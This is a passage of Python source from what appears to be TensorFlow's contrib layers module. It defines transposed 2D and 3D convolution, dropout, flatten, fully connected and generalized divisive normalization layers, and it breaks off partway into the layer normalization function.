    num_outputs: Integer, the number of output filters.
    kernel_size: A list of length 2 holding the [kernel_height, kernel_width]
      of the filters. Can be an int if both values are the same.
    stride: A list of length 2: [stride_height, stride_width].
      Can be an int if both strides are the same.  Note that presently
      both strides must have the same value.
    padding: One of 'VALID' or 'SAME'.
    data_format: A string. `NHWC` (default) and `NCHW` are supported.
    activation_fn: Activation function. The default value is a ReLU function.
      Explicitly set it to None to skip it and maintain a linear activation.
    normalizer_fn: Normalization function to use instead of `biases`. If
      `normalizer_fn` is provided then `biases_initializer` and
      `biases_regularizer` are ignored and `biases` are not created nor added.
      default set to None for no normalizer function
    normalizer_params: Normalization function parameters.
    weights_initializer: An initializer for the weights.
    weights_regularizer: Optional regularizer for the weights.
    biases_initializer: An initializer for the biases. If None skip biases.
    biases_regularizer: Optional regularizer for the biases.
    reuse: Whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: Optional list of collections for all the variables or
      a dictionary containing a different list of collection per variable.
    outputs_collections: Collection to add the outputs.
    trainable: Whether or not the variables should be trainable or not.
    scope: Optional scope for variable_scope.

  Returns:
    A tensor representing the output of the operation.

  Raises:
    ValueError: If 'kernel_size' is not a list of length 2.
    ValueError: If `data_format` is neither `NHWC` nor `NCHW`.
    ValueError: If `C` dimension of `inputs` is None.
  """
  layer_variable_getter = _build_variable_getter(
      {'bias': 'biases', 'kernel': 'weights'})
  with variable_scope.variable_scope(
      scope, 'Conv2d_transpose', [inputs], reuse=reuse,
      custom_getter=layer_variable_getter) as sc:
    if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
      raise ValueError('data_format has to be either NCHW or NHWC.')

    inputs = ops.convert_to_tensor(inputs)

    df = ('channels_first' if data_format and data_format.startswith('NC')
          else 'channels_last')
    layer = convolutional_layers.Convolution2DTranspose(
        filters=num_outputs,
        kernel_size=kernel_size,
        strides=stride,
        padding=padding,
        data_format=df,
        activation=None,
        use_bias=not normalizer_fn and biases_initializer,
        kernel_initializer=weights_initializer,
        bias_initializer=biases_initializer,
        kernel_regularizer=weights_regularizer,
        bias_regularizer=biases_regularizer,
        activity_regularizer=None,
        trainable=trainable,
        name=sc.name,
        dtype=inputs.dtype.base_dtype,
        _scope=sc,
        _reuse=reuse)
    outputs = layer.apply(inputs)

    # Add variables to collections.
    _add_variable_to_collections(layer.kernel, variables_collections, 'weights')
    # Compare against None explicitly: `layer.bias` is a variable object when
    # present, and implicit truthiness on variables/tensors is unreliable.
    # This also matches the check used by `fully_connected` below.
    if layer.bias is not None:
      _add_variable_to_collections(layer.bias, variables_collections, 'biases')

    if normalizer_fn is not None:
      normalizer_params = normalizer_params or {}
      outputs = normalizer_fn(outputs, **normalizer_params)

    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def convolution3d_transpose(
    inputs,
    num_outputs,
    kernel_size,
    stride=1,
    padding='SAME',
    data_format=DATA_FORMAT_NDHWC,
    activation_fn=nn.relu,
    normalizer_fn=None,
    normalizer_params=None,
    weights_initializer=initializers.xavier_initializer(),
    weights_regularizer=None,
    biases_initializer=init_ops.zeros_initializer(),
    biases_regularizer=None,
    reuse=None,
    variables_collections=None,
    outputs_collections=None,
    trainable=True,
    scope=None):
  """Adds a convolution3d_transpose with an optional batch normalization layer.

  The function creates a variable called `weights`, representing the
  kernel, that is convolved with the input. If `batch_norm_params` is `None`, a
  second variable called 'biases' is added to the result of the operation.

  Args:
    inputs: A 5-D `Tensor` of type `float` and shape
      `[batch, depth, height, width, in_channels]` for `NDHWC` data format or
      `[batch, in_channels, depth, height, width]` for `NCDHW` data format.
    num_outputs: Integer, the number of output filters.
    kernel_size: A list of length 3 holding the
      [kernel_depth, kernel_height, kernel_width] of the filters. Can be an
      int if all values are the same.
    stride: A list of length 3: [stride_depth, stride_height, stride_width].
      Can be an int if all strides are the same. Note that presently
      all strides must have the same value.
    padding: One of 'VALID' or 'SAME'.
    data_format: A string. `NDHWC` (default) and `NCDHW` are supported.
    activation_fn: Activation function. The default value is a ReLU function.
      Explicitly set it to None to skip it and maintain a linear activation.
    normalizer_fn: Normalization function to use instead of `biases`. If
      `normalizer_fn` is provided then `biases_initializer` and
      `biases_regularizer` are ignored and `biases` are not created nor added.
      default set to None for no normalizer function
    normalizer_params: Normalization function parameters.
    weights_initializer: An initializer for the weights.
    weights_regularizer: Optional regularizer for the weights.
    biases_initializer: An initializer for the biases. If None skip biases.
    biases_regularizer: Optional regularizer for the biases.
    reuse: Whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: Optional list of collections for all the variables or
      a dictionary containing a different list of collection per variable.
    outputs_collections: Collection to add the outputs.
    trainable: Whether or not the variables should be trainable or not.
    scope: Optional scope for variable_scope.

  Returns:
    A tensor representing the output of the operation.

  Raises:
    ValueError: If 'kernel_size' is not a list of length 3.
    ValueError: If `data_format` is neither `NDHWC` nor `NCDHW`.
    ValueError: If `C` dimension of `inputs` is None.
  """
  layer_variable_getter = _build_variable_getter(
      {'bias': 'biases', 'kernel': 'weights'})
  with variable_scope.variable_scope(
      scope, 'Conv3d_transpose', [inputs], reuse=reuse,
      custom_getter=layer_variable_getter) as sc:
    if data_format not in (DATA_FORMAT_NCDHW, DATA_FORMAT_NDHWC):
      raise ValueError('data_format has to be either NCDHW or NDHWC.')

    inputs = ops.convert_to_tensor(inputs)

    df = ('channels_first' if data_format and data_format.startswith('NC')
          else 'channels_last')
    layer = convolutional_layers.Convolution3DTranspose(
        filters=num_outputs,
        kernel_size=kernel_size,
        strides=stride,
        padding=padding,
        data_format=df,
        activation=None,
        use_bias=not normalizer_fn and biases_initializer,
        kernel_initializer=weights_initializer,
        bias_initializer=biases_initializer,
        kernel_regularizer=weights_regularizer,
        bias_regularizer=biases_regularizer,
        activity_regularizer=None,
        trainable=trainable,
        name=sc.name,
        dtype=inputs.dtype.base_dtype,
        _scope=sc,
        _reuse=reuse)
    outputs = layer.apply(inputs)

    # Add variables to collections.
    _add_variable_to_collections(layer.kernel, variables_collections, 'weights')
    # Compare against None explicitly: `layer.bias` is a variable object when
    # present, and implicit truthiness on variables/tensors is unreliable.
    # This also matches the check used by `fully_connected` below.
    if layer.bias is not None:
      _add_variable_to_collections(layer.bias, variables_collections, 'biases')

    if normalizer_fn is not None:
      normalizer_params = normalizer_params or {}
      outputs = normalizer_fn(outputs, **normalizer_params)

    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def dropout(inputs,
            keep_prob=0.5,
            noise_shape=None,
            is_training=True,
            outputs_collections=None,
            scope=None):
  """Applies dropout to `inputs`.

  Each element is kept with probability `keep_prob` and scaled up by
  `1 / keep_prob`; dropped elements become `0`. The scaling keeps the
  expected sum unchanged. When `is_training` is false, the input is
  returned untouched.

  Args:
    inputs: The tensor to pass to the nn.dropout op.
    keep_prob: A scalar `Tensor` with the same type as x. The probability
      that each element is kept.
    noise_shape: A 1-D `Tensor` of type `int32`, representing the
      shape for randomly generated keep/drop flags.
    is_training: A bool `Tensor` indicating whether or not the model
      is in training mode. If so, dropout is applied and values scaled.
      Otherwise, inputs is returned.
    outputs_collections: Collection to add the outputs.
    scope: Optional scope for name_scope.

  Returns:
    A tensor representing the output of the operation.
  """
  with variable_scope.variable_scope(
      scope, 'Dropout', [inputs], custom_getter=_model_variable_getter) as sc:
    tensor_in = ops.convert_to_tensor(inputs)
    # core Dropout is parameterized by drop rate, not keep probability.
    dropout_layer = core_layers.Dropout(
        rate=1 - keep_prob,
        noise_shape=noise_shape,
        name=sc.name,
        _scope=sc)
    dropped = dropout_layer.apply(tensor_in, training=is_training)
    return utils.collect_named_outputs(
        outputs_collections, sc.original_name_scope, dropped)
@add_arg_scope
def flatten(inputs,
            outputs_collections=None,
            scope=None):
  """Collapses all but the first (batch) dimension of `inputs` into one.

  Args:
    inputs: A tensor of size [batch_size, ...].
    outputs_collections: Collection to add the outputs.
    scope: Optional scope for name_scope.

  Returns:
    A flattened tensor with shape [batch_size, k].

  Raises:
    ValueError: If inputs rank is unknown or less than 2.
  """
  with ops.name_scope(scope, 'Flatten', [inputs]) as sc:
    inputs = ops.convert_to_tensor(inputs)
    rank = inputs.get_shape().ndims
    if rank is None or rank < 2:
      raise ValueError('Inputs must have a least 2 dimensions.')

    # Build the target shape dynamically: [batch, prod(spatial dims)].
    dyn_shape = array_ops.shape(inputs)
    dyn_batch = array_ops.slice(dyn_shape, [0], [1])
    dyn_spatial = array_ops.slice(dyn_shape, [1], [rank - 1])
    flat_dim = array_ops.expand_dims(math_ops.reduce_prod(dyn_spatial), 0)
    outputs = array_ops.reshape(
        inputs, array_ops.concat([dyn_batch, flat_dim], 0))

    # Propagate whatever static shape information is available.
    static_shape = inputs.get_shape().as_list()
    static_batch, static_spatial = static_shape[0], static_shape[1:]
    if all(static_spatial):
      merged = 1
      for dim in static_spatial:
        merged *= dim
      outputs.set_shape([static_batch, merged])
    else:
      outputs.set_shape([static_batch, None])
    return utils.collect_named_outputs(outputs_collections, sc, outputs)
def _sparse_inner_flatten(inputs, new_rank):
  """Helper function for `inner_flatten`."""
  # The static length of `dense_shape` is the rank of the sparse tensor.
  current_rank = inputs.dense_shape.get_shape().as_list()[0]
  if current_rank < new_rank:
    raise ValueError(
        'Inputs has rank less than new_rank. {} must have rank at least'
        ' {}. Received rank {}, shape {}'.format(inputs, new_rank,
                                                 current_rank,
                                                 inputs.get_shape()))

  # Keep the leading new_rank-1 dims; collapse everything after into one.
  kept_dims = inputs.dense_shape[:new_rank - 1]
  collapsed_dim = math_ops.reduce_prod(inputs.dense_shape[new_rank - 1:])
  target_shape = array_ops.concat((kept_dims, [collapsed_dim]), 0)
  return sparse_ops.sparse_reshape(inputs, target_shape)
def _dense_inner_flatten(inputs, new_rank):
  """Helper function for `inner_flatten`."""
  rank_check = check_ops.assert_rank_at_least(
      inputs, new_rank, message='inputs has rank less than new_rank')
  with ops.control_dependencies([rank_check]):
    # Keep the leading new_rank-1 dims; let reshape infer the rest with -1.
    kept_dims = array_ops.strided_slice(
        array_ops.shape(inputs), [0], [new_rank - 1])
    reshaped = array_ops.reshape(
        inputs, array_ops.concat((kept_dims, [-1]), 0))

  # When `new_rank` is a plain integer, also fold the static shape.
  if isinstance(new_rank, six.integer_types):
    static_shape = inputs.get_shape()
    if static_shape is not None and static_shape.dims is not None:
      dims = static_shape.as_list()
      merged = 1
      for inner_dim in dims[new_rank - 1:]:
        if inner_dim is None:
          # Any unknown inner dim makes the flattened dim unknown too.
          merged = None
          break
        merged *= inner_dim
      reshaped.set_shape(dims[:new_rank - 1] + [merged])
  return reshaped
@add_arg_scope
def _inner_flatten(inputs, new_rank, output_collections=None, scope=None):
  """Flattens the innermost dimensions of `inputs`, producing rank `new_rank`.

  For example:
  '''
  x = tf.random_uniform(shape=[1, 2, 3, 4, 5, 6])
  y = _inner_flatten(x, 4)
  assert y.get_shape().as_list() == [1, 2, 3, (4 * 5 * 6)]
  '''
  This layer will fail at run time if `new_rank` is greater than the current
  rank of `inputs`.

  Args:
    inputs: A `Tensor` or `SparseTensor`.
    new_rank: The desired rank of the returned `Tensor` or `SparseTensor`.
    output_collections: Collection to which the outputs will be added.
    scope: Optional scope for `name_scope`.

  Returns:
    A `Tensor` or `SparseTensor` containing the same values as `inputs`, but
    with innermost dimensions flattened to obtain rank `new_rank`.

  Raises:
    TypeError: `inputs` is not a `Tensor` or `SparseTensor`.
  """
  with ops.name_scope(scope, 'InnerFlatten', [inputs, new_rank]) as sc:
    # Dispatch on sparsity; the dense path normalizes to a Tensor first.
    if isinstance(inputs, sparse_tensor.SparseTensor):
      result = _sparse_inner_flatten(inputs, new_rank)
    else:
      result = _dense_inner_flatten(ops.convert_to_tensor(inputs), new_rank)
    return utils.collect_named_outputs(output_collections, sc, result)
def _model_variable_getter(getter, name, shape=None, dtype=None,
                           initializer=None, regularizer=None, trainable=True,
                           collections=None, caching_device=None,
                           partitioner=None, rename=None, use_resource=None,
                           **_):
  """Getter that uses model_variable for compatibility with core layers."""
  # Optionally rewrite the last path component, e.g. 'kernel' -> 'weights'.
  components = name.split('/')
  if rename and components[-1] in rename:
    components[-1] = rename[components[-1]]
    name = '/'.join(components)
  return variables.model_variable(
      name, shape=shape, dtype=dtype, initializer=initializer,
      regularizer=regularizer, collections=collections, trainable=trainable,
      caching_device=caching_device, partitioner=partitioner,
      custom_getter=getter, use_resource=use_resource)
def _build_variable_getter(rename=None):
  """Build a model variable getter that respects scope getter and renames."""

  # VariableScope will nest the getters; each level simply forwards to
  # `_model_variable_getter` with the configured rename map attached
  # (overriding any `rename` already present in the call's kwargs).
  def layer_variable_getter(getter, *args, **kwargs):
    return _model_variable_getter(
        getter, *args, **dict(kwargs, rename=rename))

  return layer_variable_getter
def _add_variable_to_collections(variable, collections_set, collections_name):
  """Adds variable (or all its parts) to all collections with that name."""
  requested = utils.get_variable_collections(
      collections_set, collections_name) or []
  # A partitioned variable contributes each of its parts individually.
  if isinstance(variable, tf_variables.PartitionedVariable):
    parts = list(variable)
  else:
    parts = [variable]
  for collection in requested:
    for part in parts:
      # Re-fetch the collection each time so duplicates are never added.
      if part not in ops.get_collection(collection):
        ops.add_to_collection(collection, part)
@add_arg_scope
def fully_connected(inputs,
                    num_outputs,
                    activation_fn=nn.relu,
                    normalizer_fn=None,
                    normalizer_params=None,
                    weights_initializer=initializers.xavier_initializer(),
                    weights_regularizer=None,
                    biases_initializer=init_ops.zeros_initializer(),
                    biases_regularizer=None,
                    reuse=None,
                    variables_collections=None,
                    outputs_collections=None,
                    trainable=True,
                    scope=None):
  """Adds a fully connected layer.

  A variable named `weights` holds the fully connected weight matrix that is
  multiplied with `inputs` to produce the hidden units. If `normalizer_fn`
  is given (e.g. `batch_norm`) it is applied to that product; otherwise, if
  `biases_initializer` is set, a `biases` variable is created and added.
  Finally `activation_fn`, when not `None`, is applied to the result.

  Note: inputs with rank greater than 2 are flattened prior to the initial
  matrix multiply by `weights`.

  Args:
    inputs: A tensor of at least rank 2 and static value for the last
      dimension; i.e. `[batch_size, depth]`, `[None, None, None, channels]`.
    num_outputs: Integer or long, the number of output units in the layer.
    activation_fn: Activation function. The default value is a ReLU function.
      Explicitly set it to None to skip it and maintain a linear activation.
    normalizer_fn: Normalization function to use instead of `biases`. If
      `normalizer_fn` is provided then `biases_initializer` and
      `biases_regularizer` are ignored and `biases` are not created nor added.
      Default is None, meaning no normalizer function.
    normalizer_params: Normalization function parameters.
    weights_initializer: An initializer for the weights.
    weights_regularizer: Optional regularizer for the weights.
    biases_initializer: An initializer for the biases. If None skip biases.
    biases_regularizer: Optional regularizer for the biases.
    reuse: Whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: Optional list of collections for all the variables
      or a dictionary containing a different list of collections per variable.
    outputs_collections: Collection to add the outputs.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
    scope: Optional scope for variable_scope.

  Returns:
    The tensor variable representing the result of the series of operations.

  Raises:
    ValueError: If x has rank less than 2 or if its last dimension is not set.
  """
  if not isinstance(num_outputs, six.integer_types):
    raise ValueError(
        'num_outputs should be int or long, got %s.' % (num_outputs,))

  getter = _build_variable_getter({'bias': 'biases', 'kernel': 'weights'})
  with variable_scope.variable_scope(
      scope, 'fully_connected', [inputs],
      reuse=reuse, custom_getter=getter) as sc:
    inputs = ops.convert_to_tensor(inputs)
    dense = core_layers.Dense(
        units=num_outputs,
        activation=None,
        use_bias=not normalizer_fn and biases_initializer,
        kernel_initializer=weights_initializer,
        bias_initializer=biases_initializer,
        kernel_regularizer=weights_regularizer,
        bias_regularizer=biases_regularizer,
        activity_regularizer=None,
        trainable=trainable,
        name=sc.name,
        dtype=inputs.dtype.base_dtype,
        _scope=sc,
        _reuse=reuse)
    net = dense.apply(inputs)

    # Expose the layer's variables through the requested collections.
    _add_variable_to_collections(dense.kernel, variables_collections,
                                 'weights')
    if dense.bias is not None:
      _add_variable_to_collections(dense.bias, variables_collections, 'biases')

    # Apply normalizer function / layer.
    if normalizer_fn is not None:
      net = normalizer_fn(net, **(normalizer_params or {}))

    if activation_fn is not None:
      net = activation_fn(net)

    return utils.collect_named_outputs(
        outputs_collections, sc.original_name_scope, net)
class GDN(base.Layer):
  """Generalized divisive normalization layer.

  Based on the papers:

    "Density Modeling of Images using a Generalized Normalization
    Transformation"
    Johannes Ballé, Valero Laparra, Eero P. Simoncelli
    https://arxiv.org/abs/1511.06281

    "End-to-end Optimized Image Compression"
    Johannes Ballé, Valero Laparra, Eero P. Simoncelli
    https://arxiv.org/abs/1611.01704

  Implements an activation function that is essentially a multivariate
  generalization of a particular sigmoid-type function:

  ```
  y[i] = x[i] / sqrt(beta[i] + sum_j(gamma[j, i] * x[j]))
  ```

  where `i` and `j` run over channels. This implementation never sums across
  spatial dimensions. It is similar to local response normalization, but much
  more flexible, as `beta` and `gamma` are trainable parameters.

  Arguments:
    inverse: If `False` (default), compute GDN response. If `True`, compute
      IGDN response (one step of fixed point iteration to invert GDN; the
      division is replaced by multiplication).
    beta_min: Lower bound for beta, to prevent numerical error from causing
      square root of zero or negative values.
    gamma_init: The gamma matrix will be initialized as the identity matrix
      multiplied with this value. If set to zero, the layer is effectively
      initialized to the identity operation, since beta is initialized as one.
      A good default setting is somewhere between 0 and 0.5.
    reparam_offset: Offset added to the reparameterization of beta and gamma.
      The reparameterization of beta and gamma as their square roots lets the
      training slow down when their values are close to zero, which is
      desirable as small values in the denominator can lead to a situation
      where gradient noise on beta/gamma leads to extreme amounts of noise in
      the GDN activations. However, without the offset, we would get zero
      gradients if any elements of beta or gamma were exactly zero, and thus
      the training could get stuck. To prevent this, we add this small
      constant. The default value was empirically determined as a good
      starting point. Making it bigger potentially leads to more gradient
      noise on the activations, making it too small may lead to numerical
      precision issues.
    data_format: Format of input tensor. Currently supports `'channels_first'`
      and `'channels_last'`.
    activity_regularizer: Regularizer function for the output.
    trainable: Boolean, if `True`, also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
    name: String, the name of the layer. Layers with the same name will
      share weights, but to avoid mistakes we require `reuse=True` in such
      cases.

  Properties:
    inverse: Boolean, whether GDN is computed (`True`) or IGDN (`False`).
    data_format: Format of input tensor. Currently supports `'channels_first'`
      and `'channels_last'`.
    beta: The beta parameter as defined above (1D `Tensor`).
    gamma: The gamma parameter as defined above (2D `Tensor`).
  """

  def __init__(self,
               inverse=False,
               beta_min=1e-6,
               gamma_init=.1,
               reparam_offset=2 ** -18,
               data_format='channels_last',
               activity_regularizer=None,
               trainable=True,
               name=None,
               **kwargs):
    super(GDN, self).__init__(trainable=trainable, name=name, **kwargs)
    self.inverse = inverse
    self._beta_min = beta_min
    self._gamma_init = gamma_init
    self._reparam_offset = reparam_offset
    self.data_format = data_format
    self.activity_regularizer = activity_regularizer
    self._channel_axis()  # trigger ValueError early
    self.input_spec = base.InputSpec(min_ndim=3, max_ndim=5)

  def _channel_axis(self):
    """Returns the axis index of the channel dimension for `data_format`."""
    try:
      return {'channels_first': 1, 'channels_last': -1}[self.data_format]
    except KeyError:
      raise ValueError('Unsupported `data_format` for GDN layer: {}.'.format(
          self.data_format))

  @staticmethod
  def _lower_bound(inputs, bound, name=None):
    """Same as tf.maximum, but with helpful gradient for inputs < bound.

    The gradient is overwritten so that it is passed through if the input is
    not hitting the bound. If it is, only gradients that push `inputs` higher
    than the bound are passed through. No gradients are passed through to the
    bound.

    Args:
      inputs: input tensor
      bound: lower bound for the input tensor
      name: name for this op

    Returns:
      tf.maximum(inputs, bound)
    """
    with ops.name_scope(name, 'GDNLowerBound', [inputs, bound]) as scope:
      inputs = ops.convert_to_tensor(inputs, name='inputs')
      bound = ops.convert_to_tensor(bound, name='bound')
      with ops.get_default_graph().gradient_override_map(
          {'Maximum': 'GDNLowerBound'}):
        return math_ops.maximum(inputs, bound, name=scope)

  @staticmethod
  def _lower_bound_grad(op, grad):
    """Gradient for `_lower_bound`.

    Args:
      op: the tensorflow op for which to calculate a gradient
      grad: gradient with respect to the output of the op

    Returns:
      gradients with respect to the inputs of the op
    """
    inputs = op.inputs[0]
    bound = op.inputs[1]
    # Pass gradients through when not clamped, or when the gradient would
    # push the input back above the bound.
    pass_through_if = math_ops.logical_or(inputs >= bound, grad < 0)
    return [math_ops.cast(pass_through_if, grad.dtype) * grad, None]

  def build(self, input_shape):
    """Creates the reparameterized `beta` and `gamma` variables."""
    channel_axis = self._channel_axis()
    input_shape = tensor_shape.TensorShape(input_shape)
    num_channels = input_shape[channel_axis].value
    if num_channels is None:
      raise ValueError('The channel dimension of the inputs to `GDN` '
                       'must be defined.')
    self._input_rank = input_shape.ndims
    self.input_spec = base.InputSpec(ndim=input_shape.ndims,
                                     axes={channel_axis: num_channels})

    # beta/gamma are stored as sqrt(value + pedestal); squaring them back in
    # use keeps gradients well-behaved near zero (see class docstring).
    pedestal = array_ops.constant(self._reparam_offset ** 2, dtype=self.dtype)
    beta_bound = array_ops.constant(
        (self._beta_min + self._reparam_offset ** 2) ** .5, dtype=self.dtype)
    gamma_bound = array_ops.constant(self._reparam_offset, dtype=self.dtype)

    def beta_initializer(shape, dtype=None, partition_info=None):
      del partition_info  # unused
      return math_ops.sqrt(array_ops.ones(shape, dtype=dtype) + pedestal)

    def gamma_initializer(shape, dtype=None, partition_info=None):
      del partition_info  # unused
      assert len(shape) == 2
      assert shape[0] == shape[1]
      eye = linalg_ops.eye(shape[0], dtype=dtype)
      return math_ops.sqrt(self._gamma_init * eye + pedestal)

    beta = self.add_variable('reparam_beta',
                             shape=[num_channels],
                             initializer=beta_initializer,
                             dtype=self.dtype,
                             trainable=True)
    beta = self._lower_bound(beta, beta_bound)
    self.beta = math_ops.square(beta) - pedestal

    gamma = self.add_variable('reparam_gamma',
                              shape=[num_channels, num_channels],
                              initializer=gamma_initializer,
                              dtype=self.dtype,
                              trainable=True)
    gamma = self._lower_bound(gamma, gamma_bound)
    self.gamma = math_ops.square(gamma) - pedestal

    self.built = True

  def call(self, inputs):
    inputs = ops.convert_to_tensor(inputs, dtype=self.dtype)
    ndim = self._input_rank

    shape = self.gamma.get_shape().as_list()
    gamma = array_ops.reshape(self.gamma, (ndim - 2) * [1] + shape)

    # Compute normalization pool.
    if self.data_format == 'channels_first':
      norm_pool = nn.convolution(math_ops.square(inputs), gamma, 'VALID',
                                 data_format='NC' + 'DHW'[-(ndim - 2):])
      if ndim == 3:
        norm_pool = array_ops.expand_dims(norm_pool, 2)
        norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NCHW')
        norm_pool = array_ops.squeeze(norm_pool, [2])
      elif ndim == 5:
        shape = array_ops.shape(norm_pool)
        # Merge the trailing spatial dims so `bias_add` (NCHW only) applies,
        # then restore the original shape. `shape` is a tensor here, so the
        # merged shape must be built with `concat`; `shape[:3] + [-1]` would
        # perform elementwise addition instead of appending a dimension.
        norm_pool = array_ops.reshape(
            norm_pool, array_ops.concat([shape[:3], [-1]], 0))
        norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NCHW')
        norm_pool = array_ops.reshape(norm_pool, shape)
      else:  # ndim == 4
        norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NCHW')
    else:  # channels_last
      norm_pool = nn.convolution(math_ops.square(inputs), gamma, 'VALID')
      norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NHWC')
    norm_pool = math_ops.sqrt(norm_pool)

    if self.inverse:
      outputs = inputs * norm_pool
    else:
      outputs = inputs / norm_pool
    outputs.set_shape(inputs.get_shape())
    return outputs

  def _compute_output_shape(self, input_shape):
    channel_axis = self._channel_axis()
    input_shape = tensor_shape.TensorShape(input_shape)
    # TensorShape exposes the rank as `ndims` (not `ndim`).
    if not 3 <= input_shape.ndims <= 5:
      raise ValueError('`input_shape` must be of rank 3 to 5, inclusive.')
    if input_shape[channel_axis].value is None:
      raise ValueError(
          'The channel dimension of `input_shape` must be defined.')
    return input_shape
# Register the custom pass-through gradient used by GDN._lower_bound.
ops.RegisterGradient('GDNLowerBound')(GDN._lower_bound_grad) # pylint:disable=protected-access
def gdn(inputs,
        inverse=False,
        beta_min=1e-6,
        gamma_init=.1,
        reparam_offset=2 ** -18,
        data_format='channels_last',
        activity_regularizer=None,
        trainable=True,
        name=None,
        reuse=None):
  """Functional interface for the GDN layer.

  Based on the papers:

    "Density Modeling of Images using a Generalized Normalization
    Transformation", Johannes Ballé, Valero Laparra, Eero P. Simoncelli,
    https://arxiv.org/abs/1511.06281

    "End-to-end Optimized Image Compression", Johannes Ballé, Valero Laparra,
    Eero P. Simoncelli, https://arxiv.org/abs/1611.01704

  Implements a multivariate generalization of a sigmoid-type activation:

  ```
  y[i] = x[i] / sqrt(beta[i] + sum_j(gamma[j, i] * x[j]))
  ```

  where `i` and `j` run over channels. Sums are never taken across spatial
  dimensions. Unlike local response normalization, `beta` and `gamma` here
  are trainable parameters.

  Args:
    inputs: Tensor input.
    inverse: If `False` (default), compute the GDN response. If `True`,
      compute the IGDN response (one fixed-point iteration to invert GDN;
      the division is replaced by multiplication).
    beta_min: Lower bound for beta, preventing numerical error from a square
      root of zero or negative values.
    gamma_init: The gamma matrix is initialized as the identity scaled by
      this value. With zero, the layer starts as the identity operation
      (beta is initialized as one). A good default lies between 0 and 0.5.
    reparam_offset: Offset added to the reparameterization of beta and gamma.
      Both are reparameterized via their square roots so training slows down
      near zero (small denominators would amplify gradient noise), but
      without this offset exactly-zero entries would have zero gradient and
      training could get stuck. The default was determined empirically;
      larger values add gradient noise to the activations, smaller values
      risk numerical precision issues.
    data_format: Format of the input tensor. Currently supports
      `'channels_first'` and `'channels_last'`.
    activity_regularizer: Regularizer function for the output.
    trainable: Boolean; if `True`, also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
    name: String, the name of the layer. Layers sharing a name share weights;
      to avoid mistakes, `reuse=True` is required in that case.
    reuse: Boolean, whether to reuse the weights of a previous layer by the
      same name.

  Returns:
    Output tensor.
  """
  # Delegate everything to the object-oriented GDN layer; this function only
  # wires the arguments through and applies the layer once.
  gdn_layer = GDN(inverse=inverse,
                  beta_min=beta_min,
                  gamma_init=gamma_init,
                  reparam_offset=reparam_offset,
                  data_format=data_format,
                  activity_regularizer=activity_regularizer,
                  trainable=trainable,
                  name=name,
                  dtype=inputs.dtype.base_dtype,
                  _scope=name,
                  _reuse=reuse)
  return gdn_layer.apply(inputs)
@add_arg_scope
def layer_norm(inputs,
               center=True,
               scale=True,
               activation_fn=None,
               reuse=None,
               variables_collections=None,
               outputs_collections=None,
               trainable=True,
               begin_norm_axis=1,
               begin_params_axis=-1,
               scope=None):
  """Adds a Layer Normalization layer.

  Based on the paper:

    "Layer Normalization"
    Jimmy Lei Ba, Jamie Ryan Kiros, Geoffrey E. Hinton
    https://arxiv.org/abs/1607.06450.

  Can be used as a normalizer function for conv2d and fully_connected.

  Given a tensor `inputs` of rank `R`, moments are calculated and
  normalization is performed over axes `begin_norm_axis ... R - 1`. Scaling
  and centering, if requested, is performed over axes
  `begin_params_axis .. R - 1`.

  By default, `begin_norm_axis = 1` and `begin_params_axis = -1`, meaning
  that normalization is performed over all but the first axis (the `HWC` if
  `inputs` is `NHWC`), while the `beta` and `gamma` trainable parameters are
  calculated for the rightmost axis (the `C` if `inputs` is `NHWC`). Scaling
  and recentering is performed via broadcast of the `beta` and `gamma`
  parameters with the normalized tensor.

  The shapes of `beta` and `gamma` are `inputs.shape[begin_params_axis:]`,
  and this part of the inputs' shape must be fully defined.

  Args:
    inputs: A tensor having rank `R`. The normalization is performed over
      axes `begin_norm_axis ... R - 1` and centering and scaling parameters
      are calculated over `begin_params_axis ... R - 1`.
    center: If True, add offset of `beta` to normalized tensor. If False,
      `beta` is ignored.
    scale: If True, multiply by `gamma`. If False, `gamma` is not used. When
      the next layer is linear (also e.g. `nn.relu`), this can be disabled
      since the scaling can be done by the next layer.
    activation_fn: Activation function, default set to None to skip it and
      maintain a linear activation.
    reuse: Whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: Optional collections for the variables.
    outputs_collections: Collections to add the outputs.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
    begin_norm_axis: The first normalization dimension: normalization will be
      performed along dimensions `begin_norm_axis : rank(inputs)`
    begin_params_axis: The first parameter (beta, gamma) dimension: scale
      and centering parameters will have dimensions
      `begin_params_axis : rank(inputs)` and will be broadcast with the
      normalized inputs accordingly.
    scope: Optional scope for `variable_scope`.

  Returns:
    A `Tensor` representing the output of the operation, having the same
    shape and dtype as `inputs`.

  Raises:
    ValueError: If the rank of `inputs` is not known at graph build time,
      or if `inputs.shape[begin_params_axis:]` is not fully defined at
      graph build time.
  """
  with variable_scope.variable_scope(scope, 'LayerNorm', [inputs],
                                     reuse=reuse) as sc:
    inputs = ops.convert_to_tensor(inputs)
    inputs_shape = inputs.shape
    inputs_rank = inputs_shape.ndims
    if inputs_rank is None:
      raise ValueError('Inputs %s has undefined rank.' % inputs.name)
    dtype = inputs.dtype.base_dtype
    # Normalize a negative begin_norm_axis into an absolute axis index so
    # the range check and `range()` call below work.
    if begin_norm_axis < 0:
      begin_norm_axis = inputs_rank + begin_norm_axis
    if begin_params_axis >= inputs_rank or begin_norm_axis >= inputs_rank:
      raise ValueError(
          'begin_params_axis (%d) and begin_norm_axis (%d) '
          'must be < rank(inputs) (%d)'
          % (begin_params_axis, begin_norm_axis, inputs_rank))
